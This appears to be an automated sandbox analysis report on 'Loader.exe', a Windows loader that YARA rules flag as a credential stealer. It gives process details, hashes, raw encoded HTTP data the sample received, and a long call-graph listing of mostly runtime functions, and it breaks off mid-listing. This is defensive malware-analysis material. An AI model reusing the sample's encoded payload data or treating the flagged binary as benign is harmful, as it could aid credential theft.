                                                                                        2024-12-31 16:38:49 UTC1369INData Raw: 50 33 64 78 4c 74 50 50 76 6a 74 6c 6d 43 6a 74 32 66 50 51 58 57 47 6f 2f 45 56 39 6a 2f 39 50 37 74 53 46 48 31 53 48 38 70 54 54 55 32 79 32 44 67 35 4f 78 39 44 30 7a 4f 32 56 38 31 68 6c 56 53 77 64 74 64 30 32 54 72 65 65 4f 59 6b 69 57 4b 49 79 6d 4b 4f 75 49 59 70 6d 41 30 76 76 31 49 51 42 7a 58 78 50 2f 50 58 39 44 42 30 6c 46 53 2b 33 48 6d 37 31 76 61 36 6f 70 30 62 67 37 38 36 52 48 31 62 62 6b 71 74 59 70 63 45 4e 6b 46 4e 77 66 4f 46 39 6a 48 56 31 46 6d 4f 79 5a 74 51 56 30 73 69 66 36 6f 52 62 4e 68 30 4b 76 6f 76 61 6b 72 33 55 65 5a 32 45 2b 73 7a 78 32 49 77 6f 58 56 46 53 61 30 50 36 4b 4f 45 57 74 63 66 4c 5a 66 4e 75 4a 59 63 71 30 35 4a 6a 53 50 7a 52 33 52 52 50 72 62 54 39 43 45 68 4e 5a 55 4d 4c 62 77 4e 30 4f 4c 37 41 6f 2b 6f
                                                                                        Data Ascii: P3dxLtPPvjtlmCjt2fPQXWGo/EV9j/9P7tSFH1SH8pTTU2y2Dg5Ox9D0zO2V81hlVSwdtd02TreeOYkiWKIymKOuIYpmA0vv1IQBzXxP/PX9DB0lFS+3Hm71va6op0bg786RH1bbkqtYpcENkFNwfOF9jHV1FmOyZtQV0sif6oRbNh0Kvovakr3UeZ2E+szx2IwoXVFSa0P6KOEWtcfLZfNuJYcq05JjSPzR3RRPrbT9CEhNZUMLbwN0OL7Ao+o
                                                                                        2024-12-31 16:38:49 UTC1369INData Raw: 55 6f 6d 6b 6b 6f 43 73 49 43 42 30 52 52 37 49 4f 31 78 39 48 68 5a 38 55 70 76 56 38 70 30 41 57 4d 73 46 6a 59 41 62 7a 71 39 7a 73 34 7a 4e 6b 2f 59 37 64 43 56 42 50 4f 34 41 4f 56 70 37 52 67 4a 7a 30 76 62 75 71 78 6c 67 70 79 6a 70 74 79 62 49 33 31 53 71 6d 4f 69 71 39 33 38 39 4a 47 77 2f 34 67 51 31 4c 68 4e 41 48 6b 61 64 36 75 32 2b 59 6c 4b 70 47 63 69 48 4c 2f 57 37 4c 62 36 57 77 76 62 39 65 52 64 57 63 7a 6a 32 44 54 39 6a 50 6b 64 2f 5a 74 4f 73 34 59 77 6b 66 62 5a 36 32 5a 38 46 30 37 63 30 72 76 4c 31 6c 73 45 6a 43 46 70 55 4a 36 6f 6e 53 45 34 55 56 33 64 69 37 2f 54 37 6c 77 4e 6e 74 67 2f 30 76 79 48 78 72 6c 71 4a 68 4a 54 79 32 52 67 4a 4a 7a 41 4f 31 69 5a 57 4b 6a 74 58 65 57 32 62 71 38 57 4d 4a 55 71 31 44 4d 6d 33 47 2b 6d
                                                                                        Data Ascii: UomkkoCsICB0RR7IO1x9HhZ8UpvV8p0AWMsFjYAbzq9zs4zNk/Y7dCVBPO4AOVp7RgJz0vbuqxlgpyjptybI31SqmOiq9389JGw/4gQ1LhNAHkad6u2+YlKpGciHL/W7Lb6Wwvb9eRdWczj2DT9jPkd/ZtOs4YwkfbZ62Z8F07c0rvL1lsEjCFpUJ6onSE4UV3di7/T7lwNntg/0vyHxrlqJhJTy2RgJJzAO1iZWKjtXeW2bq8WMJUq1DMm3G+m


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:38:07
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Loader.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                        Imagebase:0x320000
                                                                                        File size:834'048 bytes
                                                                                        MD5 hash:932410F2B859E916C9C7A8B801348466
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:11:38:07
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:11:38:08
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Loader.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                        Imagebase:0x320000
                                                                                        File size:834'048 bytes
                                                                                        MD5 hash:932410F2B859E916C9C7A8B801348466
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2338745992.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2352050415.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2375611870.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2375179400.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2390068678.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:8.1%
                                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                                          Signature Coverage:1.1%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:29
                                                                                          execution_graph 18574 327020 18579 3274f4 18574->18579 18580 327504 18579->18580 18581 32702a 18579->18581 18580->18581 18586 329bf5 InitializeCriticalSectionEx 18580->18586 18583 327254 18581->18583 18587 327269 18583->18587 18586->18580 18588 327278 18587->18588 18589 32727f 18587->18589 18593 33102c 18588->18593 18596 330fbb 18589->18596 18592 327034 18594 330fbb std::ios_base::_Init 32 API calls 18593->18594 18595 33103e 18594->18595 18595->18592 18599 33121e 18596->18599 18600 33122a ___scrt_is_nonwritable_in_current_image 18599->18600 18607 331cd1 EnterCriticalSection 18600->18607 18602 331238 18608 331042 18602->18608 18604 331245 18618 33126d 18604->18618 18607->18602 18609 3310d0 std::_Locinfo::_Locinfo_dtor 18608->18609 18610 33105d 18608->18610 18609->18604 18610->18609 18611 33c025 std::ios_base::_Init 32 API calls 18610->18611 18617 3310b0 18610->18617 18613 3310a6 18611->18613 18612 33c025 std::ios_base::_Init 32 API calls 18614 3310c6 18612->18614 18615 335677 ___free_lconv_mon 14 API calls 18613->18615 18616 335677 ___free_lconv_mon 14 API calls 18614->18616 18615->18617 18616->18609 18617->18609 18617->18612 18621 331ce8 LeaveCriticalSection 18618->18621 18620 330fec 18620->18592 18621->18620 18622 328a20 18623 328a42 18622->18623 18627 328a57 18622->18627 18628 328bb5 18623->18628 18629 328c21 18628->18629 18632 328bd0 18628->18632 18630 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18629->18630 18631 328a47 18630->18631 18631->18627 18634 332a39 18631->18634 18632->18629 18633 332a74 69 API calls 18632->18633 18633->18629 18635 332a44 18634->18635 18636 332a59 18634->18636 18637 3312d4 __strnicoll 14 API calls 18635->18637 18636->18635 18638 332a60 18636->18638 18639 332a49 18637->18639 18644 331384 18638->18644 18642 3319bf __strnicoll 29 API calls 18639->18642 18641 332a6f 18641->18627 18643 332a54 18642->18643 18643->18627 18645 331397 _Fputc 18644->18645 18648 3315fd 18645->18648 18647 3313ac _Fputc 18647->18641 18650 331609 ___scrt_is_nonwritable_in_current_image 18648->18650 18649 33160f 18651 331b68 __strnicoll 29 API calls 18649->18651 18650->18649 18653 331652 18650->18653 18652 33162a 18651->18652 18652->18647 18659 32d0ff EnterCriticalSection 18653->18659 18655 33165e 18660 331511 18655->18660 18657 331674 18671 33169d 18657->18671 18659->18655 18661 331537 18660->18661 18662 331524 18660->18662 18674 331438 18661->18674 18662->18657 18664 33155a 18665 3315e8 18664->18665 18666 331575 18664->18666 18678 33c32c 18664->18678 18665->18657 18668 3321a8 ___scrt_uninitialize_crt 64 API calls 18666->18668 18670 331588 18668->18670 18692 33c112 18670->18692 18743 32d113 LeaveCriticalSection 18671->18743 18673 3316a5 18673->18652 18675 331449 18674->18675 18677 3314a1 18674->18677 18675->18677 18695 33c0d2 18675->18695 18677->18664 18679 33c6fe 18678->18679 18680 33c735 18679->18680 18681 33c70d 18679->18681 18683 338e04 _Ungetc 29 API calls 18680->18683 18682 331b68 __strnicoll 29 API calls 18681->18682 18691 33c728 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18682->18691 18684 33c73e 18683->18684 18705 33c130 18684->18705 18687 33c7e8 18708 33c388 18687->18708 18689 33c7ff 18689->18691 18720 33c533 18689->18720 18691->18666 18693 33c273 _Fputc 31 API calls 18692->18693 18694 33c12b 18693->18694 18694->18665 18696 33c0e6 _Fputc 18695->18696 18699 33c273 18696->18699 18698 33c0fb _Fputc 18698->18677 18700 33cd8f _Fputc 29 API calls 18699->18700 18701 33c285 18700->18701 18702 33c2a1 SetFilePointerEx 18701->18702 18704 33c28d _Fputc 18701->18704 18703 33c2b9 GetLastError 18702->18703 18702->18704 18703->18704 18704->18698 18727 33c14e 18705->18727 18709 33c397 _Fputc 18708->18709 18710 338e04 _Ungetc 29 API calls 18709->18710 18711 33c3b3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18710->18711 18714 33c130 33 API calls 18711->18714 18716 33c3bf 18711->18716 18712 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18713 33c531 18712->18713 18713->18691 18715 33c413 18714->18715 18715->18716 18717 33c445 ReadFile 18715->18717 18716->18712 18717->18716 18718 33c46c 18717->18718 18719 33c130 33 API calls 18718->18719 18719->18716 18721 338e04 _Ungetc 29 API calls 18720->18721 18722 33c546 18721->18722 18723 33c130 33 API calls 18722->18723 18726 33c590 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18722->18726 18724 33c5ed 18723->18724 18725 33c130 33 API calls 18724->18725 18724->18726 18725->18726 18726->18691 18728 33c15a ___scrt_is_nonwritable_in_current_image 18727->18728 18729 33c19d 18728->18729 18731 33c1e3 18728->18731 18737 33c149 18728->18737 18730 331b68 __strnicoll 29 API calls 18729->18730 18730->18737 18738 33cfd8 EnterCriticalSection 18731->18738 18733 33c1e9 18734 33c20a 18733->18734 18735 33c273 _Fputc 31 API calls 18733->18735 18739 33c26b 18734->18739 18735->18734 18737->18687 18737->18689 18737->18691 18738->18733 18742 33cffb LeaveCriticalSection 18739->18742 18741 33c271 18741->18737 18742->18741 18743->18673 16661 32a112 16662 32a11e ___scrt_is_nonwritable_in_current_image 16661->16662 16687 32737a 16662->16687 16664 32a125 16665 32a27e 16664->16665 16675 32a14f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 16664->16675 16725 329a33 IsProcessorFeaturePresent 16665->16725 16667 32a285 16705 32f139 16667->16705 16672 32a16e 16673 32a1ef 16698 3316ac 16673->16698 16675->16672 16675->16673 16708 32f183 16675->16708 16677 32a1f5 16702 3220c0 FreeConsole 16677->16702 16682 32a21a 16683 32a223 16682->16683 16716 32f165 16682->16716 16719 3273b3 16683->16719 16688 327383 16687->16688 16732 32969b IsProcessorFeaturePresent 16688->16732 16692 327394 16697 327398 16692->16697 16742 32d060 16692->16742 16695 3273af 16695->16664 16697->16664 16699 3316b5 16698->16699 16700 3316ba 16698->16700 16814 3317d5 16699->16814 16700->16677 17728 3220b0 16702->17728 18139 32f284 16705->18139 16709 32f199 ___scrt_is_nonwritable_in_current_image std::_Locinfo::_Locinfo_dtor 16708->16709 16709->16673 16710 33590a _unexpected 39 API calls 16709->16710 16713 3338bc 16710->16713 16711 331f43 CallUnexpected 39 API calls 16712 3338e6 16711->16712 16713->16711 16714 3299e0 GetModuleHandleW 16715 3299ec 16714->16715 16715->16667 16715->16682 16717 32f284 std::locale::_Setgloballocale 21 API calls 16716->16717 16718 32f170 16717->16718 16718->16683 16720 3273bf 16719->16720 16721 3273d5 16720->16721 18212 32d072 16720->18212 16721->16672 16723 3273cd 16724 32ab0e ___scrt_uninitialize_crt 7 API calls 16723->16724 16724->16721 16726 329a49 std::locale::_Setgloballocale std::bad_exception::bad_exception 16725->16726 16727 329af4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16726->16727 16728 329b38 std::locale::_Setgloballocale 16727->16728 16728->16667 16729 32f14f 16730 32f284 std::locale::_Setgloballocale 21 API calls 16729->16730 16731 32a293 16730->16731 16733 32738f 16732->16733 16734 32aaef 16733->16734 16751 335346 16734->16751 16737 32aaf8 16737->16692 16739 32ab00 16740 32ab0b 16739->16740 16765 335382 16739->16765 16740->16692 16805 3379e9 16742->16805 16745 32ab0e 16746 32ab21 16745->16746 16747 32ab17 16745->16747 16746->16697 16748 334404 ___vcrt_uninitialize_ptd 6 API calls 16747->16748 16749 32ab1c 16748->16749 16750 335382 ___vcrt_uninitialize_locks DeleteCriticalSection 16749->16750 16750->16746 16752 33534f 16751->16752 16754 335378 16752->16754 16756 32aaf4 16752->16756 16769 33f629 16752->16769 16755 335382 ___vcrt_uninitialize_locks DeleteCriticalSection 16754->16755 16755->16756 16756->16737 16757 3343d1 16756->16757 16786 33f53a 16757->16786 16760 3343e6 16760->16739 16763 334401 16763->16739 16766 3353ac 16765->16766 16767 33538d 16765->16767 16766->16737 16768 335397 DeleteCriticalSection 16767->16768 16768->16766 16768->16768 16774 33f6bb 16769->16774 16772 33f661 InitializeCriticalSectionAndSpinCount 16773 33f64c 16772->16773 16773->16752 16775 33f643 16774->16775 16778 33f6dc 16774->16778 16775->16772 16775->16773 16776 33f744 GetProcAddress 16776->16775 16778->16775 16778->16776 16779 33f735 16778->16779 16781 33f670 LoadLibraryExW 16778->16781 16779->16776 16780 33f73d FreeLibrary 16779->16780 16780->16776 16782 33f687 GetLastError 16781->16782 16783 33f6b7 16781->16783 16782->16783 16784 33f692 ___vcrt_FlsFree 16782->16784 16783->16778 16784->16783 16785 33f6a8 LoadLibraryExW 16784->16785 16785->16778 16787 33f6bb ___vcrt_FlsFree 5 API calls 16786->16787 16788 33f554 16787->16788 16789 33f56d TlsAlloc 16788->16789 16790 3343db 16788->16790 16790->16760 16791 33f5eb 16790->16791 16792 33f6bb ___vcrt_FlsFree 5 API calls 16791->16792 16793 33f605 16792->16793 16794 33f620 TlsSetValue 16793->16794 16795 3343f4 16793->16795 16794->16795 16795->16763 16796 334404 16795->16796 16797 33440e 16796->16797 16798 334414 16796->16798 16800 33f575 16797->16800 16798->16760 16801 33f6bb ___vcrt_FlsFree 5 API calls 16800->16801 16802 33f58f 16801->16802 16803 33f5a7 TlsFree 16802->16803 16804 33f59b 16802->16804 16803->16804 16804->16798 16806 3379f9 16805->16806 16807 3273a1 16805->16807 16806->16807 16809 337152 16806->16809 16807->16695 16807->16745 16812 337159 16809->16812 16810 33719c GetStdHandle 16810->16812 16811 3371fe 16811->16806 16812->16810 16812->16811 16813 3371af GetFileType 16812->16813 16813->16812 16815 3317de 16814->16815 16816 3317f4 16814->16816 16815->16816 16820 331716 16815->16820 16816->16700 16818 3317eb 16818->16816 16837 3318e3 16818->16837 16821 331722 16820->16821 16822 33171f 16820->16822 16846 337220 16821->16846 16822->16818 16827 331733 16873 335677 16827->16873 16828 33173f 16879 331801 16828->16879 16833 335677 ___free_lconv_mon 14 API calls 16834 331763 16833->16834 16835 335677 ___free_lconv_mon 14 API calls 16834->16835 16836 331769 16835->16836 16836->16818 16838 331954 16837->16838 16844 3318f2 16837->16844 16838->16816 16839 3369b4 __strnicoll 14 API calls 16839->16844 16840 331958 16841 335677 ___free_lconv_mon 14 API calls 16840->16841 16841->16838 16842 3357c1 WideCharToMultiByte _Fputc 16842->16844 16844->16838 16844->16839 16844->16840 16844->16842 16845 335677 ___free_lconv_mon 14 API calls 16844->16845 17447 33ca05 16844->17447 16845->16844 16847 337229 16846->16847 16851 331728 16846->16851 16901 3359c5 16847->16901 16852 33c92e GetEnvironmentStringsW 16851->16852 16853 33c946 16852->16853 16854 33172d 16852->16854 16855 3357c1 _Fputc WideCharToMultiByte 16853->16855 16854->16827 16854->16828 16856 33c963 16855->16856 16857 33c978 16856->16857 16858 33c96d FreeEnvironmentStringsW 16856->16858 16859 3356b1 __strnicoll 15 API calls 16857->16859 16858->16854 16860 33c97f 16859->16860 16861 33c987 16860->16861 16862 33c998 16860->16862 16863 335677 ___free_lconv_mon 14 API calls 16861->16863 16864 3357c1 _Fputc WideCharToMultiByte 16862->16864 16865 33c98c FreeEnvironmentStringsW 16863->16865 16866 33c9a8 16864->16866 16865->16854 16867 33c9b7 16866->16867 16868 33c9af 16866->16868 16869 335677 ___free_lconv_mon 14 API calls 16867->16869 16870 335677 ___free_lconv_mon 14 API calls 16868->16870 16871 33c9b5 FreeEnvironmentStringsW 16869->16871 16870->16871 16871->16854 16874 335682 RtlFreeHeap 16873->16874 16875 331739 16873->16875 16874->16875 16876 335697 GetLastError 16874->16876 16875->16818 16877 3356a4 __dosmaperr 16876->16877 16878 3312d4 __strnicoll 12 API calls 16877->16878 16878->16875 16880 331816 16879->16880 16881 3369b4 __strnicoll 14 API calls 16880->16881 16882 33183d 16881->16882 16883 331845 16882->16883 16894 33184f 16882->16894 16884 335677 ___free_lconv_mon 14 API calls 16883->16884 16900 331746 16884->16900 16885 3318ac 16886 335677 ___free_lconv_mon 14 API calls 16885->16886 16886->16900 16887 3369b4 __strnicoll 14 API calls 16887->16894 16888 3318bb 17437 3317a6 16888->17437 16892 335677 ___free_lconv_mon 14 API calls 16895 3318c8 16892->16895 16893 3318d6 17443 3319ec IsProcessorFeaturePresent 16893->17443 16894->16885 16894->16887 16894->16888 16894->16893 16896 335677 ___free_lconv_mon 14 API calls 16894->16896 17428 3352ec 16894->17428 16898 335677 ___free_lconv_mon 14 API calls 16895->16898 16896->16894 16898->16900 16899 3318e2 16900->16833 16902 3359d0 16901->16902 16906 3359d6 16901->16906 16951 336334 16902->16951 16907 3359dc 16906->16907 16956 336373 16906->16956 16910 3359e1 16907->16910 16973 331f43 16907->16973 16908 3359f4 16961 3369b4 16908->16961 16929 3375e1 16910->16929 16914 335a08 16916 336373 __strnicoll 6 API calls 16914->16916 16915 335a1d 16917 336373 __strnicoll 6 API calls 16915->16917 16918 335a14 16916->16918 16919 335a29 16917->16919 16922 335677 ___free_lconv_mon 14 API calls 16918->16922 16920 335a2d 16919->16920 16921 335a3c 16919->16921 16923 336373 __strnicoll 6 API calls 16920->16923 16968 335c1c 16921->16968 16925 335a1a 16922->16925 16923->16918 16925->16907 16927 335677 ___free_lconv_mon 14 API calls 16928 335a4e 16927->16928 16928->16910 16930 33760b 16929->16930 17246 33746d 16930->17246 16935 33764b 17260 337268 16935->17260 16936 33763d 16937 335677 ___free_lconv_mon 14 API calls 16936->16937 16939 337624 16937->16939 16939->16851 16941 337683 16942 3312d4 __strnicoll 14 API calls 16941->16942 16943 337688 16942->16943 16945 335677 ___free_lconv_mon 14 API calls 16943->16945 16944 3376ca 16947 337713 16944->16947 17271 33799c 16944->17271 16945->16939 16946 33769e 16946->16944 16949 335677 ___free_lconv_mon 14 API calls 16946->16949 16948 335677 ___free_lconv_mon 14 API calls 16947->16948 16948->16939 16949->16944 16984 3366cd 16951->16984 16954 33636b TlsGetValue 16955 336359 16955->16906 16957 3366cd std::_Locinfo::_Locinfo_dtor 5 API calls 16956->16957 16958 33638f 16957->16958 16959 3359f0 16958->16959 16960 3363ad TlsSetValue 16958->16960 16959->16907 16959->16908 16966 3369c1 __strnicoll 16961->16966 16962 336a01 17002 3312d4 16962->17002 16963 3369ec HeapAlloc 16964 335a00 16963->16964 16963->16966 16964->16914 16964->16915 16966->16962 16966->16963 16999 32f46b 16966->16999 17039 335d82 16968->17039 17141 337aa0 16973->17141 16976 331f53 16978 331f7c 16976->16978 16979 331f5d IsProcessorFeaturePresent 16976->16979 16980 32f14f std::locale::_Setgloballocale 21 API calls 16978->16980 16981 331f69 16979->16981 16982 331f86 16980->16982 17171 331a20 16981->17171 16985 3366fd 16984->16985 16989 336350 16984->16989 16985->16989 16991 336602 16985->16991 16988 336717 GetProcAddress 16988->16989 16990 336727 std::_Locinfo::_Locinfo_dtor 16988->16990 16989->16954 16989->16955 16990->16989 16997 336613 ___vcrt_FlsFree 16991->16997 16992 3366a9 16992->16988 16992->16989 16993 336631 LoadLibraryExW 16994 3366b0 16993->16994 16995 33664c GetLastError 16993->16995 16994->16992 16996 3366c2 FreeLibrary 16994->16996 16995->16997 16996->16992 16997->16992 16997->16993 16998 33667f LoadLibraryExW 16997->16998 16998->16994 16998->16997 17005 32f4a6 16999->17005 17016 335a5b GetLastError 17002->17016 17004 3312d9 17004->16964 17006 32f4b2 ___scrt_is_nonwritable_in_current_image 17005->17006 17011 331cd1 EnterCriticalSection 17006->17011 17008 32f4bd std::locale::_Setgloballocale 17012 32f4f4 17008->17012 17011->17008 17015 331ce8 LeaveCriticalSection 17012->17015 17014 32f476 17014->16966 17015->17014 17017 335a71 17016->17017 17021 335a77 17016->17021 17018 336334 __strnicoll 6 API calls 17017->17018 17018->17021 17019 336373 __strnicoll 6 API calls 17020 335a93 17019->17020 17023 3369b4 __strnicoll 12 API calls 17020->17023 17036 335a7b SetLastError 17020->17036 17021->17019 17021->17036 17024 335aa8 17023->17024 17025 335ac1 17024->17025 17026 335ab0 17024->17026 17028 336373 __strnicoll 6 API calls 17025->17028 17027 336373 __strnicoll 6 API calls 17026->17027 17030 335abe 17027->17030 17029 335acd 17028->17029 17031 335ad1 17029->17031 17032 335ae8 17029->17032 17034 335677 ___free_lconv_mon 12 API calls 17030->17034 17033 336373 __strnicoll 6 API calls 17031->17033 17035 335c1c __strnicoll 12 API calls 17032->17035 17033->17030 17034->17036 17037 335af3 17035->17037 17036->17004 17038 335677 ___free_lconv_mon 12 API calls 17037->17038 17038->17036 17040 335d8e ___scrt_is_nonwritable_in_current_image 17039->17040 17053 331cd1 EnterCriticalSection 17040->17053 17042 335d98 17054 335dc8 17042->17054 17045 335dd4 17046 335de0 ___scrt_is_nonwritable_in_current_image 17045->17046 17058 331cd1 EnterCriticalSection 17046->17058 17048 335dea 17059 335bd1 17048->17059 17050 335e02 17063 335e22 17050->17063 17053->17042 17057 331ce8 LeaveCriticalSection 17054->17057 17056 335c8a 17056->17045 17057->17056 17058->17048 17060 335be0 __Getctype 17059->17060 17061 335c07 __Getctype 17059->17061 17060->17061 17066 339e4a 17060->17066 17061->17050 17140 331ce8 LeaveCriticalSection 17063->17140 17065 335a47 17065->16927 17067 339eca 17066->17067 17071 339e60 17066->17071 17068 339f18 17067->17068 17070 335677 ___free_lconv_mon 14 API calls 17067->17070 17134 339fe4 17068->17134 17072 339eec 17070->17072 17071->17067 17073 339e93 17071->17073 17076 335677 ___free_lconv_mon 14 API calls 17071->17076 17074 335677 ___free_lconv_mon 14 API calls 17072->17074 17075 339eb5 17073->17075 17082 335677 ___free_lconv_mon 14 API calls 17073->17082 17077 339eff 17074->17077 17078 335677 ___free_lconv_mon 14 API calls 17075->17078 17080 339e88 17076->17080 17081 335677 ___free_lconv_mon 14 API calls 17077->17081 17083 339ebf 17078->17083 17079 339f26 17084 339f86 17079->17084 17086 335677 14 API calls ___free_lconv_mon 17079->17086 17094 3392a1 17080->17094 17088 339f0d 17081->17088 17089 339eaa 17082->17089 17090 335677 ___free_lconv_mon 14 API calls 17083->17090 17085 335677 ___free_lconv_mon 14 API calls 17084->17085 17091 339f8c 17085->17091 17086->17079 17092 335677 ___free_lconv_mon 14 API calls 17088->17092 17122 3395bd 17089->17122 17090->17067 17091->17061 17092->17068 17095 3392b2 17094->17095 17121 33939b 17094->17121 17096 3392c3 17095->17096 17097 335677 ___free_lconv_mon 14 API calls 17095->17097 17098 3392d5 17096->17098 17100 335677 ___free_lconv_mon 14 API calls 17096->17100 17097->17096 17099 3392e7 17098->17099 17101 335677 ___free_lconv_mon 14 API calls 17098->17101 17102 3392f9 17099->17102 17103 335677 ___free_lconv_mon 14 API calls 17099->17103 17100->17098 17101->17099 17104 33930b 17102->17104 17105 335677 ___free_lconv_mon 14 API calls 17102->17105 17103->17102 17106 33931d 17104->17106 17108 335677 ___free_lconv_mon 14 API calls 17104->17108 17105->17104 17107 33932f 17106->17107 17109 335677 ___free_lconv_mon 14 API calls 17106->17109 17110 339341 17107->17110 17111 335677 ___free_lconv_mon 14 API calls 17107->17111 17108->17106 17109->17107 17112 335677 ___free_lconv_mon 14 API calls 17110->17112 17114 339353 17110->17114 17111->17110 17112->17114 17113 339377 17118 339389 17113->17118 17119 335677 ___free_lconv_mon 14 API calls 17113->17119 17115 335677 ___free_lconv_mon 14 API calls 17114->17115 17116 339365 17114->17116 17115->17116 17116->17113 17117 335677 ___free_lconv_mon 14 API calls 17116->17117 17117->17113 17118->17121 17119->17118 17121->17073 17123 3395ca 17122->17123 17133 339622 17122->17133 17124 335677 ___free_lconv_mon 14 API calls 17123->17124 17126 3395da 17123->17126 17124->17126 17125 3395ec 17128 3395fe 17125->17128 17130 335677 ___free_lconv_mon 14 API calls 17125->17130 17126->17125 17127 335677 ___free_lconv_mon 14 API calls 17126->17127 17127->17125 17129 339610 17128->17129 17131 335677 ___free_lconv_mon 14 API calls 17128->17131 17132 335677 ___free_lconv_mon 14 API calls 17129->17132 17129->17133 17130->17128 17131->17129 17132->17133 17133->17075 17135 33a010 17134->17135 17136 339ff1 17134->17136 17135->17079 17136->17135 17137 3396ab __Getctype 14 API calls 17136->17137 17138 33a00a 17137->17138 17139 335677 ___free_lconv_mon 14 API calls 17138->17139 17139->17135 17140->17065 17177 337d23 17141->17177 17144 337ac7 17147 337ad3 ___scrt_is_nonwritable_in_current_image 17144->17147 17145 335a5b __strnicoll 14 API calls 17154 337b04 std::locale::_Setgloballocale 17145->17154 17146 337b23 17149 3312d4 __strnicoll 14 API calls 17146->17149 17147->17145 17147->17146 17148 337b35 std::locale::_Setgloballocale 17147->17148 17147->17154 17151 337b6b std::locale::_Setgloballocale 17148->17151 17191 331cd1 EnterCriticalSection 17148->17191 17150 337b28 17149->17150 17188 3319bf 17150->17188 17156 337ca5 17151->17156 17157 337ba8 17151->17157 17167 337bd6 17151->17167 17154->17146 17154->17148 17170 337b0d 17154->17170 17159 337cb0 17156->17159 17223 331ce8 LeaveCriticalSection 17156->17223 17157->17167 17192 33590a GetLastError 17157->17192 17161 32f14f std::locale::_Setgloballocale 21 API calls 17159->17161 17162 337cb8 17161->17162 17164 33590a _unexpected 39 API calls 17168 337c2b 17164->17168 17166 33590a _unexpected 39 API calls 17166->17167 17219 337c51 17167->17219 17169 33590a _unexpected 39 API calls 17168->17169 17168->17170 17169->17170 17170->16976 17172 331a3c std::locale::_Setgloballocale std::bad_exception::bad_exception 17171->17172 17173 331a68 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17172->17173 17176 331b39 std::locale::_Setgloballocale 17173->17176 17175 331b57 17175->16978 17238 327191 17176->17238 17178 337d2f ___scrt_is_nonwritable_in_current_image 17177->17178 17183 331cd1 EnterCriticalSection 17178->17183 17180 337d3d 17184 337d7f 17180->17184 17183->17180 17187 331ce8 LeaveCriticalSection 17184->17187 17186 331f48 17186->16976 17186->17144 17187->17186 17224 331c0e 17188->17224 17190 3319cb 17190->17170 17191->17151 17193 335920 17192->17193 17194 335926 17192->17194 17195 336334 __strnicoll 6 API calls 17193->17195 17196 336373 __strnicoll 6 API calls 17194->17196 17198 33592a SetLastError 17194->17198 17195->17194 17197 335942 17196->17197 17197->17198 17200 3369b4 __strnicoll 14 API calls 17197->17200 17202 3359ba 17198->17202 17203 3359bf 17198->17203 17201 335957 17200->17201 17204 335970 17201->17204 17205 33595f 17201->17205 17202->17166 17206 331f43 CallUnexpected 37 API calls 17203->17206 17208 336373 __strnicoll 6 API calls 17204->17208 17207 336373 __strnicoll 6 API calls 17205->17207 17209 3359c4 17206->17209 17217 33596d 17207->17217 17210 33597c 17208->17210 17211 335980 17210->17211 17212 335997 17210->17212 17214 336373 __strnicoll 6 API calls 17211->17214 17213 335c1c __strnicoll 14 API calls 17212->17213 17216 3359a2 17213->17216 17214->17217 17215 335677 ___free_lconv_mon 14 API calls 17215->17198 17218 335677 ___free_lconv_mon 14 API calls 17216->17218 17217->17215 17218->17198 17220 337c1d 17219->17220 17221 337c55 17219->17221 17220->17164 17220->17168 17220->17170 17237 331ce8 LeaveCriticalSection 17221->17237 17223->17159 17225 331c20 _Fputc 17224->17225 17228 331b68 17225->17228 17227 331c38 _Fputc 17227->17190 17229 331b7f 17228->17229 17230 331b78 17228->17230 17232 331b8d 17229->17232 17233 